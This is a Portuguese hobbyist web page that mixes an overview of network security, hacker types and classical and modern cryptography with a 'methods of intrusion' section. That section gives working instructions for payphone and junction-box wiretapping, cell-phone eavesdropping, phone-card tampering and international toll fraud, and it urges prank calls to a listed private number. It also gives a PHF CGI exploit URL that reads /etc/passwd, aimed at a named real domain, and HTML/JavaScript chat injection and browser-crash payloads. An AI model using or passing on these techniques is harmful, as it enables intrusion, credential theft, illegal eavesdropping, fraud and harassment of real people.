Durante as primeiras décadas de sua existência, as redes de
computadores foram principalmente usadas por pesquisadores universitários,
para enviar mensagens de correio eletrônico, e por funcionários
de empresas, para compartilhar impressoras. Sob essas condições,
a segurança nunca precisou de maiores cuidados. Mas atualmente,
como milhões de cidadãos comuns estão usando as redes
para executar operações bancárias, fazer compras e
arquivar suas devoluções de impostos, a segurança
das redes está despontando no horizonte como um problema em potencial.
A segurança é um assunto abrangente e inclui inúmeros
tipos de pecados. Em sua forma mais simples, a segurança se preocupa
em garantir que pessoas mal-intencionadas não leiam ou, pior ainda,
modifiquem mensagens enviadas a outros destinatários. Outra preocupação
da segurança se volta para as pessoas que tentam ter acesso a serviços
remotos, os quais elas não estão autorizadas a usar. Ela
também permite que você faça a distinção
entre uma mensagem supostamente verdadeira e um trote. A segurança
trata de situações em que mensagens legítimas são
capturadas e reproduzidas, além de lidar com pessoas que negam terem
enviado determinadas mensagens.
A maior parte dos problemas de segurança são intencionalmente
causadas por pessoas que tentam obter algum benefício ou prejudicar
alguém.
Veja abaixo quem são e o que fazem estas pessoas:
De todas estas pessoas, as que mais merecem destaque e que serão
objetos do nosso estudo são os Hackers.
Hackers
A hierarquia do mundo underground é muito simples: ou a pessoa é
um Hacker, ou não. Simples assim: se a pessoa tem conhecimentos
aprofundados em qualquer assunto (de preferência pouco explorado),
ela pode se considerar um Hacker; caso contrário, se a pessoa não
tem nenhuma novidade em nenhum campo da computação ou correlatos,
e apenas utiliza o conhecimento dos Hackers para fazer suas investidas,
ela é considerada inferior, pouco ou nada interessante, e é
sumariamente ignorada.
Dentro do fechado e pequeno grupo dos verdadeiros gênios dos computadores,
podem-se distinguir três sub-grupos principais:
Hacker: É aquela pessoa que possui uma grande facilidade de análise,
assimilação, compreensão e capacidades surpreendentes
de conseguir fazer o que quiser (literalmente) com um computador. Ele sabe
perfeitamente que nenhum sistema é completamente livre de falhas,
e sabe onde procurar por elas, utilizando de técnicas das mais variadas
(aliás, quanto mais variado, mais valioso é o conhecimento
do Hacker).
Cracker: Possui tanto conhecimento quanto os Hackers, mas com a diferença
de que, para eles, não basta entrar em sistemas, quebrar senhas,
e descobrir falhas. Eles precisam deixar um aviso de que estiveram lá,
geralmente com recados malcriados, algumas vezes destruindo partes do sistema,
e até aniquilando com tudo o que vêem pela frente. Também
são atribuídos aos crackers programas que retiram travas
em softwares, bem como os que alteram suas características, adicionando
ou modificando opções, muitas vezes relacionadas à
pirataria.
Phreaker: É especializado em telefonia. Faz parte de suas principais
atividades as ligações gratuitas
(tanto local como interurbano e internacional), reprogramação
de centrais telefônicas, instalação de escutas (não
aquelas colocadas em postes telefônicos, mas imagine algo no sentido
de, a cada vez que seu telefone tocar, o dele também o fará,
e ele poderá ouvir sua conversa), etc. O conhecimento de um phreaker
é essencial para se buscar informações que seriam
muito úteis nas mãos de mal-intencionados. Além de
permitir que um possível ataque a um sistema tenha como ponto de
partida provedores de acessos em outros países,
suas técnicas permitem não somente ficar invisível
diante de um provável rastreamento, como também forjar o
culpado da ligação fraudulenta, fazendo com que o coitado
pague o pato (e a conta).
Agora, fora desses grupos acima, temos inúmeras categorias de "não-Hackers",
onde se enquadram a maioria dos pretendentes a Hacker, e a cada dia, surgem
novos termos para designá-los. São os principais:
Lamers: Lamer é aquele cara que quer aprender sobre Hackers, e sai
perguntando para todo mundo. Os Hackers, ou qualquer outra categoria, não
gostam disso, e passam a lhe insultar, chamando-o de lamer. Ou seja, novato.
Wannabe: É o principiante que aprendeu a usar algumas receitas de
bolo (programas já prontos para descobrir
senhas ou invadir sistemas), entrou em um provedor de fundo de quintal
e já acha que vai conseguir entrar nos computadores da Nasa.
Arackers: Esses são os piores! Os "Hackers-de-araque", são
a maioria absoluta no submundo cibernético.
Algo em torno de 99,9%. Fingem ser os mais ousados e espertos usuários
de computador, planejam ataques, fazem reuniões durante as madrugadas
(ou pelo menos até a hora em que a mãe mandar dormir), contam
de casos absurdamente fantasiosos, mas no final das contas vão fazer
download no site da Playboy ou jogar algum desses "killerware", resultando
na mais chata e engraçada espécie: a "Odonto-Hackers" - o
Hacker da boca pra fora!
O termo: Hacker, originalmente, designava qualquer pessoa que fosse extremamente
especializada em uma determinada área. Qualquer fera em qualquer
assunto, poderia ser considerado um Hacker. Por exemplo: sua Tia Matilde
pode ser um Hacker da culinária, ou seu mecânico predileto
pode ser um Hacker de automóveis... Somente com a ajuda do cinema
americano, é que o termo Hacker de Computador passou a ser utilizado
largamente, mas nem por isso perdeu sua identidade. Quem não se
lembra do filme War Games, onde um garoto, brincando com seu modem, acessa
(por acidente!) o NORAD, simplesmente o computador responsável pela
segurança de guerra dos Estados Unidos da América? Evidentemente,
as pesquisas e técnicas realizadas pelo garoto para descobrir a
senha do suposto jogo (ele não sabia em que estava se metendo) é
digna de um Hacker. Pelo menos dos Hackers daquela época...
Seguindo a lógica americana, que produz "filmes propagandas" que
induzem aos telespectadores desejar ser o que o filme mostra - assim como
TopGun foi uma propaganda à Marinha, e Cortina de Fogo uma propaganda
para o Corpo de Bombeiros, com War Games aconteceu a mesma coisa: vários
adolescentes que tinham um modem começaram a sonhar com os controles
da terceira guerra mundial em suas mãos, ou mais especificamente
em sua escrivaninha, no quarto.
Isso não quer dizer que este filme foi a base de lançamento
de atitudes Hacker por todo o mundo, mas foi um dos responsáveis
pela dilatação desses pensamentos. O mercado americano (sim,
mais uma vez estamos girando em torno dos Estados Unidos - tem outro jeito?)
abarrotou as prateleiras de livros como Cyberpunk, e mais tarde, qualquer
nota sobre invasão de sistemas ou crimes relacionados a computadores
ganhavam um espaço cada vez maior na mídia. Existiam Hackers
de verdade sim!
Eram pessoas que trabalhavam em projetos de computadores e técnicos
altamente especializados. Mas também existiam aqueles garotos, que
após descobrirem que invadir um sistema ou lançar um míssil
não era tão fácil quanto ver um filme ou ler um livro,
insistiram e estudaram muito (as maiores virtudes dos Hackers são
a força de vontade e a dedicação aos estudos), conseguiram
muitas proezas e hoje, grande parte trabalha na área de segurança
de computadores. O resto está preso.
A grande maioria dos Hackers são jovens. Dizem que é uma
fase da vida de cada micreiro. E além do mais o jovem tem muito
mais tempo para estudar e aprender. Depois que cresce, precisa se preocupar
com a vida de verdade e passa a trabalhar (geralmente com computadores),
deixando de invadir sistemas ou fazer coisas piores. Os poucos que continuam
a praticar atos de Hacker são espiões industriais ou especialistas
em segurança, e passam a fazer um jogo de gente grande, onde a pessoa
vai precisar deter de verdade os invasores perigosos (os espiões),
e estes se protegerem do risco de invadir sistemas (e da polícia).
Não poderemos continuar falando sobre Hackers, se antes não
explicarmos o que é, e como funciona a Criptografia.
Criptografia
Historicamente, quatro grupos de pessoas utilizaram e contribuíram
para a arte da criptografia: os militares, os diplomatas, as pessoas que
gostam de guardar memórias e os amantes. Dentre eles, os militares
tiveram o papel mais importante e definiram as bases para a tecnologia.
Dentro das organizações militares, tradicionalmente as mensagens
a serem cifradas são entregues a auxiliares mal pagos que se encarregam
de criptografá-las e transmiti-las. O grande volume de mensagens
impedia que esse trabalho fosse feito por poucos especialistas.
Até o advento dos computadores, uma das principais restrições
da criptografia era a habilidade do auxiliar de criptografia fazer as transformações
necessárias, em geral com poucos equipamentos e no campo de batalha.
Uma outra restrição era a dificuldade de alternar os
métodos criptográficos rapidamente, pois isso exigia a repetição
do treinamento de um grande número de pessoas. No entanto, o perigo
de um auxiliar de criptografia ser capturado pelo inimigo tornou indispensável
a possibilidade de alterar o método criptográfico instantaneamente,
se necessário.
A criptografia funciona do seguinte modo: as mensagens a serem criptografadas,
conhecidas como texto simples, são transformadas por uma função
que é parametrizada por uma chave. Em seguida, a saída do
processo de criptografia, é conhecida como texto cifrado.
A arte de criar mensagens cifradas (criptografia) e solucioná-las
(criptoanálise) é coletivamente chamada de criptologia (criptology).
Será sempre útil e prático ter uma notação
para estabelecer uma relação entre o texto simples, o texto
cifrado e as chaves. Utilizaremos C = EK(P) para denotar que a criptografia
do texto simples ‘P’ usando a chave ‘K’ gera o texto cifrado ‘C’. da mesma
forma, P = DK(C) representa a decriptografia de ‘C’ para obter-se o texto
simples outra vez. Em seguida temos:
DK(EK(P)) = P
Essa notação sugere que ‘E’ e ‘D’ são simplesmente
funções matemáticas, o que é verdade. A única
parte complicada é que ambas são funções de
dois parâmetros, e escrevemos um desses parâmetros (a chave)
como um caractere subscrito, em vez de como um argumento, para distingui-lo
da mensagem.
Uma regra fundamental da criptografia é que se deve assumir que
o analista especializado conheça o método genérico
de criptografia que é utilizado. Em outras palavras, o criptoanalista
sabe como funciona o método de criptografia, ‘E’. O esforço
necessário para inventar, testar e instalar um novo método
a cada que o antigo é (supostamente) comprometido sempre dificultou
a manutenção deste segredo.
É nesse ponto que a chave entra. A chave consiste em um string (relativamente)
curto que seleciona uma das muitas possíveis formas de criptografia.
Ao contrário do método genérico, que só pode
ser modificado de anos em anos, a chave pode ser alterada sempre que necessário.
Portanto, nosso modelo básico é um método genérico
publicamente conhecido, parametrizado com uma chave secreta que pode ser
alterada com facilidade.
Não é possível enfatizar o caráter não-sigiloso
do algorítimo. Ao tornar o algorítimo público, o especialista
em criptografar se livra de consultar inúmeros de criptólogos
ansiosos por decodificar o sistema para que possam publicar artigos demonstrando
sua esperteza e inteligência. Caso muitos especialistas tenham tentado
decodificar o algorítimo durante cinco anos após a sua publicação
e nenhum tenha tido sucesso, isso provavelmente significa que o algorítimo
seja muito bom.
Na verdade o sigilo está na chave, e seu tamanho é uma questão
muito importante do projeto. Considere que uma combinação
esteja bloqueada. O princípio geral é o de que você
informa os dígitos seqüencialmente. Todo mundo sabe disso,
mas a chave é secreta. Uma chave com o tamanho de dois dígitos
permite 100 combinações , e uma chave com seis dígitos
significa um milhão de combinações. Quanto maior for
a chave, mais alto será o fator de trabalho (work factor) com que
o criptoanalista terá de lidar. O fator de trabalho para decodificar
o sistema através de uma exaustiva pesquisa no espaço da
chave é exponencial em relação ao tamanho da chave.
O sigilo é decorrente da presença de um algorítimo
eficaz (mas público) e de uma chave longa. Para impedir que o seu
irmãozinho leia as suas mensagens de correio eletrônico, serão
necessárias chaves de 64 bits. Para manter o governo de outros países
à distância, são necessárias chaves de pelo
menos 256 bits.
Do ponto de vista do criptoanalista, o problema de criptoanálise
apresenta três variações principais. Quando tem um
determinado volume de texto cifrado mas nenhum texto simples, o analista
é confrontado com o problema de haver somente texto cifrado (ciphertext
only). Os criptogramas da seção de palavras cruzadas do jornal
são um exemplo desse tipo de problema. Quando há uma correspondência
entre o texto cifrado e o texto simples, o problema passa a ser chamado
de texto simples conhecido (known plain text). Por fim, quando o criptoanalista
tem a possibilidade de codificar trechos do texto simples escolhidos por
ele mesmo, temos o problema do texto simples escolhidos (chosen plaintext).
Os criptogramas dos jornais poderiam ser trivialmente decodificados se
o criptoanalista tivesse a permissão de fazer perguntas tais como:
Qual é a criptografia para ABCDE?
Com freqüência, os novatos na área de criptografia pressupõem
que se uma condição puder resistir a uma estratégia
de texto cifrado, isso significa que ela é segura. Essa suposição
é muito ingênua. Em muitos casos, o criptoanalista pode fazer
uma estimativa com base em trechos do texto simples. Por exemplo, a primeira
mensagem que muitos sistema de tempo compartilhado emite quando você
o chama é: “POR FAVOR, ESTABELEÇA O LOGIN”. Equipado com
alguns pares do texto simples / texto cifrado, o trabalho do criptoanalista
se torna muito mais fácil. Para obter segurança, o autor
da criptografia deve ser conservador e se certificar de que o sistema seja
inviolável mesmo que seu oponente seja capaz de criptografar o texto
simples escolhido.
Historicamente, os métodos de criptografia têm sido divididos
em duas categorias : as cifras de substituição e as cifras
de transposição. Em seguida, trataremos de cada uma destas
técnicas como informações básicas para a criptografia
moderna.
Cifras de Substituição
Em uma cifra de substituição (substitution ciphers), cada
letra ou grupo de letras é substituído por outra letra ou
grupo de letras, de modo a criar um “disfarce”. Uma das cifras mais antigas
conhecidas é a cifra de César. Nesse modo, ’a’ passa
a ser ‘D’, ‘b’ torna-se ‘E’, ‘c’ passa a ser ‘F’ e assim por diante. Por
exemplo, ‘attack’ passaria a ser ‘DWWDFN’. Nestes exemplos, o texto simples
é apresentado em letras minúsculas e o texto cifrado em maiúsculas.
Uma ligeira generalização da cifra de César permite
que o alfabeto do texto cifrado seja deslocado ‘k’ letras, em vez de 3.
Neste caso ‘k’ passa a ser uma chave para o método genérico
dos alfabetos deslocados circularmente. A cifra de César pode ter
enganado os cartagineses, mas não enganou ninguém desde então.
O próximo aprimoramento é fazer com que cada um dos símbolos
do texto simples, digamos 26 letras, seja mapeado para alguma outra letra.
Texto simples: a b c d
e f g h i j k l m n o
p q r s t u v w x y z
Texto cifrado: Q W E R T Y U I O P A S D
F G H J K L Z X C V B N M
Este sistema geral é chamado de substituição monoalfabética,
sendo a chave o string de 26 letras correspondente ao alfabeto completo.
Para a chave anterior, o texto ‘attack’ seria transformado no texto cifrado
‘QZZQEA’.
A primeira vista, talvez este sistema pareça seguro ,pois apesar
de conhecer o sistema genérico (substituição de letra
por letra), o criptoanalista não sabe quais das 26! (aproximadamente
4x1026) chaves possíveis estão em uso. Ao contrário
do que acontece com a cifra de César, experimentar todas elas não
é uma estratégia muito interessante. Mesmo a 1µs por
solução, um computador levaria 1013 anos para experimentar
todas as chaves.
Todavia, com um volume de texto cifrado surpreendentemente pequeno, a cifra
pode ser descoberta com facilidade. A estratégia básica se
beneficia das propriedades estatística dos idiomas.
Outra estratégia é adivinhar uma palavra ou frase provável,
nos EUA por exemplo, uma palavra muito provável em uma mensagem
de uma empresa de contabilidade é ‘financial’. Utilizando o nosso
conhecimento de que ‘financial’ tem três caracteres repetidos (‘n’,
‘i’ e ‘a’), com outras letras entre suas ocorrências, estamos procurando
letras repetidas no texto com esse espaço entre elas. Desse ponto
em diante, fica fácil deduzir a chave utilizando a estatística
de freqüência para o texto em inglês.
Cifras de Transposição
As cifras de substituição disfarçam a ordem dos símbolos no texto simples, apesar de preservarem sua ordem. Por outro as cifras de transposição (transposition ciphers) reordenam as letras, mas não as disfarçam. A figura abaixo mostra uma cifra de transposição muito comum, a transposição de colunas. A cifra se baseia em uma chave que é uma palavra ou frase contendo letras repetidas. Nesse exemplo, MEGABUCK é a chave. O objetivo da chave é numerar colunas de modo que a coluna 1 fique abaixo da letra da chave mais próxima do início do alfabeto, e assim por diante. O texto simples é escrito horizontalmente, em linhas. O texto cifrado é lido em colunas, a partir daquela cuja letra da chave seja mais baixa.
Para romper uma cifra de transposição, o criptoanalista deve
primeiro estar ciente de que está lidando com uma cifra de transposição.
A próxima etapa é fazer uma perspectiva do número
de colunas. Em muitos casos, uma palavra ou frase provável pode
ser deduzida através do contexto da mensagem.
A última etapa é ordenar as colunas. Quando o número
de colunas , ‘k’, é pequeno, cada um dos pares de colunas k(k-1)
pode ser examinado para que seja constatado se suas freqüências
de diagrama correspondem às do texto simples em inglês. O
par que tiver a melhor correspondência será considerado como
posicionado da forma correta. Em seguida, cada uma das colunas restantes
é experimentada como sucessora deste par. A coluna cujas freqüências
de diagramas e trigramas proporcione a melhor correspondência será
experimentalmente considerada como correta.
Criptografia Moderna
DES
Em janeiro de 1977, o governo dos Estados Unidos adotou uma cifra de produto
desenvolvida pela IBM como seu padrão oficial para informações
não-confidenciais. A cifra, DES (Data Encryption Standard), foi
largamente adotada pelo setor de informática para uso de produtos
de segurança. Em sua forma original, ela já não é
tão segura; no entanto se modificada ela ainda pode ser útil.
Agora explicaremos como o DES funciona.
O DES é basicamente uma cifra de substituição monoalfabética
que utiliza um caractere de 64 bits. Sempre que o mesmo bloco de texto
cifrado de 64 bits é submetido ao processo, obtém-se o mesmo
bloco de texto cifrado em 64 bits. Um criptoanalista pode explorar essa
propriedade para ajudá-lo a decifrar o DES.
Para vermos como essa propriedade da cifra de substituição
monoalfabética pode ser usada para subverter o DES, consideraremos
a criptografia de uma longa mensagem de maneira mais óbvia: através
de sua divisão em blocos consecutivos de 8 bytes (64 bits) e de
sua decodificação um após o outro com a mesma chave.
O último bloco volta a ter 64 bits, se necessário. Essa técnica
é chamada de modo do livro de código eletrônico (electronic
code book mode).
IDEA
O IDEA foi projetado por dois pesquisadores na Suíça. Ele
utiliza uma chave de 128 bits, que o tornará imune à qualquer
técnica ou máquina conhecida atualmente.
A estrutura básica do algoritmo se assemelha à do DES no
que diz respeito ao fato dos blocos de entrada de texto simples de 64 bits
serem deturpados em uma seqüência de interações
parametrizadas para produzir blocos de saída de texto cifrado com
64 bits. Devido à extensiva deturpação dos bits (em
cada iteração, cada bit de saída depende de cada bit
de entrada), são necessárias oito interações.
Algorítimos de chave pública
Historicamente, o problema da distribuição de chaves sempre
foi o ponto fraco da maioria dos sistemas de criptografia. Mesmo sendo
sólido, se um intruso pudesse roubar a chave, o sistema acabaria
se tornando inútil. Como todos os criptólogos sempre presumem
que a chave de criptografia e a chave de decriptografia são iguais
(ou facilmente derivadas uma da outra) e que a chave seja distribuída
a todos os usuários do sistema, tinha-se a impressão de que
havia um problema embutido inerente: as chaves tinham de ser protegidas
contra roubo, mas também tinham de ser distribuídas; portanto,
elas não podiam ser simplesmente trancadas no caixa-forte de um
banco.
Em 1976, dois pesquisadores da Universidade de Stanford, Diffie e Hellman
(1976), propuseram um sistema de criptografia radicalmente novo, no qual
as chaves de criptografia e de decriptografia eram diferentes e a chave
de decriptografia não podia ser derivada da chave de criptografia.
Em sua proposta, o algorítimo de criptografia (chaveado), E, e o
algorítimo de decriptografia (chaveado), D, tinham de atender a
três requisitos, que podem ser declarados da seguinte forma:
1. D(E(P)) = P.
2. É excessivamente difícil deduzir
D de E.
3. E não pode ser decifrado através
do ataque de texto simples escolhido.
O primeiro requisito diz que se aplicarmos D a uma mensagem criptografada,
E(P), obteremos a mensagem de texto simples original P, outra vez. O segundo
é auto-explicativo. O terceiro é necessário porque,
como veremos em um minuto, os intrusos podem experimentar o algoritmo até
se cansarem. Sob essas condições, não há razão
para a chave criptográfica não se tornar pública.
O método funciona da seguinte forma: Uma pessoa, desejando receber
mensagens secretas, primeiro cria dois algoritmos, EA e DA, que atendem
aos requisitos mostrados anteriormente. O algoritmo de criptografia e a
chave, EA, se tornam públicos, daí o nome criptografia com
chave pública – public key criptography (para diferenciá-la
da criptografia tradicional com chave secreta). Isso pode ser feito colocando-se
a chave em um arquivo que todos os interessados possam ler. Essa pessoa
publica o algoritmo de decriptografia (para obter a consultoria grátis),
mas mantém a chave de decriptografia secreta. Assim, EA é
pública, mas DA é privada.
Talvez seja interessante fazer uma observação sobre terminologia.
A criptografia com chave pública exige que cada usuário tenha
duas chaves: uma chave pública, que é usada pelo mundo inteiro
para criptografar as mensagens a serem enviadas para esse usuário,
e uma chave privada, que o usuário utiliza para decriptografar mensagens.
Métodos de invasão
Hacker:
Quebrando Senhas
Cavalo de Tróia
O hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugar de destruir programas e arquivos, ele tem a função de descobrir senhas. O cavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou num disquete que o hacker passa, com jogos ou outros programas, para usuários do computador que quer invadir. Cada vez que o usuário escreve nome e senha, o cavalo de Tróia grava os dados. Como é programado para se conectar com seu criador, por meio do modem, em dia e hora marcados, ele transmite os dados que copiou. Elementar, para quem conhece muito bem as linguagens de computador.
Farejamento de redes
Para acelerar a sua transmissão, os dados que entram nas redes, provenientes de vários computadores, são agrupados em pacotes. O hacker cria programas farejadores que monitoram a circulação desses pacotes nas redes e procuram neles palavras como password e senha. Quando as encontra, o programa copia o pacote e o envia para o computador do hacker. Os dados chegam codificados, mas isso não é problema para ele, que, em geral conhece bem criptografia, o conjunto de técnicas que permite codificar dados.
Engenharia social
É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nome dos filhos são muito comuns. Se o hacker tiver acesso a essas informações do usuário, vai tentá-las, como primeira opção, para descobrir sua senha. Alguns chegam a arrumar emprego temporário na empresa que pretendem invadir. Lá dentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora de digitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser um hacker.
Quebra-cabeça
Um jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, o hacker cria programas capazes de montar todo tipo de combinação de letras e números. O sistema funciona bem para senhas de até seis caracteres. O processo pode levar muito tempo, porque as tentativas precisam ser feitas em períodos curtos, com grandes intervalos (dias, se for possível) entre um e outro, para não despertar suspeitas. No Brasil é um método muito difundido, pois as senhas em geral são simples e dificilmente os computadores possuem sistema de proteção.
Phreaker:
Fraudando orelhões com um aparelho comum
Primeiro você deve arrumar um telefone comum bem pequeno e compacto.
Depois você tem que descascar os fios dele (vão dar em 2 fios).
Então arrume um bom alicate, estilete ou faca e vá até
um orelhão.
Descasque os fios do orelhão pegue os dois fios descascados do orelhão
e entrelace com os dois fios do seu telefone, observe a polarização,
ou seja se o seu telefone portátil ficar sem linha inverta a posição
dos fios telefônicos, pois, ao contrário do que muita gente
pensa o orelhão tem fio negativo e positivo. Agora é só
efetuar a ligação de seu telefone comum...
Fraude a orelhões através de notebook
O processo para se conectar notebooks a orelhões, é igual
ao de se conectar telefones comuns.
Resumirei nesse item, algumas considerações a respeito da
fiação do notebook, que segue os padrões da FCC Americana
e é um pouco diferente da nossa.
O conector do fio do notebook, é do tipo ‘jack’, tem quatro fios
dentro dele. Arranque o conector de plástico transparente que fica
na ponta do fio, pegue os dois fios centrais e separe-os dos fios das extremidades.
Estes dois fios centrais, são os que serão utilizados para
fazer a ligação no orelhão. Eu aconselho que você
coloque jacarés neles (pequeno gancho achado em qualquer loja de
componentes eletrônicos).
Basta conectar-se a BBS's da mesma forma que você se conecta em casa.
Caso você queira testar se está tudo ok, abra um programa
de terminal qualquer e digite ATA, se fizer um barulhinho parecido com
o tom de linha está tudo OK.
Fraude em caixa de verificação
As caixas de verificação (ou armários na linguagem
"técnica" da TELESP) são caixas de ferro, que geralmente
ficam localizadas em vias públicas, e são utilizadas para
se fazer a checagem das linhas telefônicas e detectar problemas antes
que chegue a central. Tais caixas costumam ser da cor cinza e tem cerca
de 1,5 m de altura, com um código em preto escrito na parte superior.
Para fazer tal tipo de fraude, basta, que você pegue um das dezenas
de pares de fios que se encontram lá e entrelace nos 2 fios de seu
telefone portátil, cujo qual estará com seus fios descascados.
Observe também a polarização. Vale lembrar que você
não deve destruir a caixa para abri-la, se é que ela já
não esteja arrombada.
Fraude com aparelho celular
O sistema de telefonia celular é altamente vulnerável a escutas.
É simples se fazer escutas telefônicas, e outras coisas como:
clonagem de telefones para se efetuar ligações gratuitas,
etc. Se você duvida, pegue um celular como o famoso e numeroso PT-550
da Motorola.
Tire a bateria do celular e note que ha' três encaixes metálicos
atras do aparelho. Coloque um pedaço de papel laminado no encaixe
do meio e recoloque a bateria. Ligue o telefone (ele esta agora no modo
de programação) e digite:
# 08 # 11 XXXX #
Onde:
#08 Liga o áudio de RS (Receptor) #11 Ajusta canal de funcionamento do transreceptor XXXX numero do canal (aconselho a você tentar números abaixo de 800)
Exemplo:
#08#11567#
Tente ate encontrar um canal onde haja conversa. Você esta fazendo uma escuta em um telefone celular. Não requer pratica nem tão pouco habilidade.
Ligando em orelhões à cartão
sem pagar:
Enganando o telefone público
Bote o cartão , assim que a pessoa falar ALÔ! segure o numero 9 e retire o cartão ,fique segurando o numero 9 até acabar de falar!
Grafite
O grafite é um material super condutor que conduz energia, e o cartão funciona assim , ele tem uns 50 fusíveis, cada ligação gasta ele queima um fusível, então o nosso amigo grafite que é condutor de eletricidade, não deixa queimar os fusíveis então faça o seguinte atras do cartão,(na parte cinza) rabisque-a com força e ,bote no telefone publico e pronto ,mas lembre-se rabisque com força!
Esmalte de unha incolor
O esmalte impede que esses fusíveis queimem, faça também esse com os cartões de vídeo game. Passe esmalte na parte de traz do cartão ,e no de vídeo game passe na parte da fita magnética! se você sabe mais uma dica mande para mim! pode ter seu nome e seu e-mail aqui! Pegue o cartão telefônico ZERADO dai bote ele de molho na água cândida, depois de 3 ou 4 dias a tinta do cartão vai sair , depois pegue papel alumínio e cubra as partes metálicas com o papel alumínio , dai as ligações virarão infinitas!
Ligação internacional gratuita
Para fazer uma ligação internacional, todos sabem que é
muito fácil ligar, mas pagar que é o problema.
Durante esses anos muitos vêm acessando BBS estrangeiras usando boxes
para não pagar a ligação.
Com o que vamos ensinar agora, você vai poder ligar para qualquer
lugar do mundo pagando um impulso normal sem usar nenhum programa além
do seu dial.
O sistema é o seguinte: O número da linha para onde você
vai ligar é 316-433-9418, nos EUA. Como você está no
Brasil e vai ligar para os EUA você deve discar então 01 316-433-9418
(Vai pagar uma nota se fizer assim !). O que você deve fazer é
usar um código de área que vai confundir os aparelhos da
EMBRATEL, e esse código é 0008.
Vamos detalhar tudo:
Para enganar, você deve discar 0008 01 316-433-9418.
0 Ao discar o primeiro 0, a EMBRATEL vai pensar que é um procedimento normal e não vai dar nenhuma mensagem.
0 Ao discar o segundo zero a EMBRATEL vai tentar localizar um país que tenha como código de área 00. Não vai encontrar nenhum, mas como você vai ser rápido e discar o terceiro zero antes da mensagem poder ser passada para você. Aí você vai pensar... "Mesmo depois que eu já tiver discado o terceiro número ela vai me dar a mensagem do segundo zero. "Não é verdade, pois os computadores estarão ocupados tentando localizar o terceiro zero e não terão mais tempo de mandar a mensagem.
0 Ao discar o terceiro zero os computadores da EMBRATEL já estarão totalmente doidos com os zeros que você estará discando. Lembre-se que você tem que ser rápido ao discar, pois se você demorar, as mensagens que ainda não apareceram, provavelmente vão aparecer.
8 Ao discar o oito você estará mostrando aos computadores da Embratel que estarão perdidos que você está querendo fazer uma ligação internacional.
0 Mais um zero para deixar os computadores realmente perdidos.
1
Código de área dos Estados Unidos. Pode ser trocado por qualquer
outro código de qualquer outro país.
316-433-9418
Número da casa de um coitado aí qualquer. Se quiserem se
divertir passem uns trotes para ele.... Em inglês claro
!
O ataque via browser é um dos ataques mais
fáceis de executar, mas não
da nem 50% de sucessos nos ataques. Vou tentar
explicar como você usa
esse método:
Primeiramente você tem que entender o que
está fazendo, não adianta
selecionar a dica aperta CTRL+C e colocar no
navegador achando que ele vai
fazer tudo para você não, entenda:
Bom, como já sabe o geralmente o arquivo
"passwd" é o que contém os
passwords encripitados (se você não
sabe ainda, dá um olhada na seção
"SISTEMA UNIX"), existem vários servidores
que só Root pode entrar no
diretório "/etc", para outros usuários
é bloqueado o acesso a esse diretório,
mas existe um método para tentar pegar
esse arquivo. No diretório /cgi-bin do
Web Server (Pagina WEB do servidor) geralmente
contém um arquivos
chamado PHF. O PHF permite aos usuários
ganhar acesso remoto para
arquivos (inclusive o /etc/passwd). Então
através desse arquivo você pode
tentar pegar a lista de passwords, é muito
simples, apenas digite essa URL no
seu browser:
http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Então substitua o "xxx.xxx.xxx" pelo endereço
do servidor que você quer
hackear.
Ex.: http://www.tba.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Bom, mas se você usar um pouco a cabeça
vai ver que para que não de
nada errado e você pode usar o anonymizer
(Se você não ainda o que é o
anonymizer, dá uma olhada na seção
Anônimo), bom não é certeza que dá pra
usar não porque eu nunca tentei, mas pela
lógica dá.
Build Your Free Home PageVisit other great pages on:Entertainment>EntertainmentMusic>MusicTechno/ElectronicaTechno/Electronica
Hackeando Chats
(Esses comandos só funcionam em chats com HTML)
COMANDO -1 - Este comando quando ativado mostra uma mensagem
na barra de status ; escreva o seguinte; - < a href="#still"
onMouseOver="window.status=' mensagem ';return true" >
COMANDO -2 - Quando o internauta escolhido passar com o mouse
em cima do link aparece na tela um aviso de alert ; - escreva o
seguinte;< a href="" onMouseOver="var bg=alert(' mensagem ' )" >
passe o mouse aqui</a>-você pode colocar foto ou gif substituindo a
mensagem.
COMANDO - 3 - Este comando abre uma janela de identificação na tela
do internauta escolhido; escreva o seguinte : -< FORM method=post
name="FormAction" action="mailto:"+ aqui você coloca o seu mail >
COMANDO - 4 - Para enviar imagem escreva o seguinte ; - < img
src=http://www. . . .coloque aqui o endereço da imagem . . .> - caso você
não tenha o endereço, procure no final da pagina: se preferir retornar
para a sala e quiser capturar uma imagem, clic com a tecla da direita do
mouse em cima da imagem, e olhe no LOCATION, la vai estar o
endereço.
COMANDO - 5 - Para você alterar a côr da mensagem, escreva o
seguinte : -< font color= . . .aqui você coloca a cor desejada "sempre em
ingles"..></font >
COMANDO - 6 - Para você alterar o tamanho da letra, escreva o
seguinte ; - <H1>. . .mensagem. . .</H1>..este comando vai de H1 até H6
COMANDO - 7 - Para fazer o texto correr, escreva o seguinte ; -<
marquee >. . .aqui você escreva o texto. . .</marquee>..este comando só
funciona com explorer e no chat da UNINET
COMANDO - 8 - Para centralizar o texto, escreva o seguinte ; -< center
>. . .aqui você escreva o texto..</center>
COMANDO - 9 - Para mudar o pano de fundo, escreva o seguinte ; -<
body bacground=http://www. ...aqui você coloca o endereço... jpg >..este
comando só funciona com explorer e no chat da UNINET
COMANDO - 10- Para você fazer um link, escreva o seguinte ; -< a
href=http://aki vc coloca o endereco > clic aqui e faça uma
viagem maravilhosa < /a >..quando o internauta clicar, ele aciona o link
e sai instantaneamente da sala.
COMANDO - 11 - -Comando para abrir 30 janelas do netscape;
<img src=http://www.matrix.com.br/frazzon/fogo.gif onLoad="alert('\n Hasta
La Vista Baby \n\n Bye Bye!!');variCounter=0;while(true)window.open('http:
//www.NETural.com/~ccamel');"CRASHING"+iCounter('width=1,height=1,resiza
ble=no');iCounter++">
12-Esse abre 30 janelas se vc passar o mouse em cima do link, que e' uma ima-
gem que pega toda a tela
<a href="" onMouseOver="alert('\n Vc nao deveria ter movido o mouse ate
aqui. \n\n HASTA La ViStA BaBy! \n\n «-&127ÐÍ£&127-»');while(true)history.go(0);
window.setTimeout('ReloadBomb()',1)"><img src="http://www.uninet.com.br
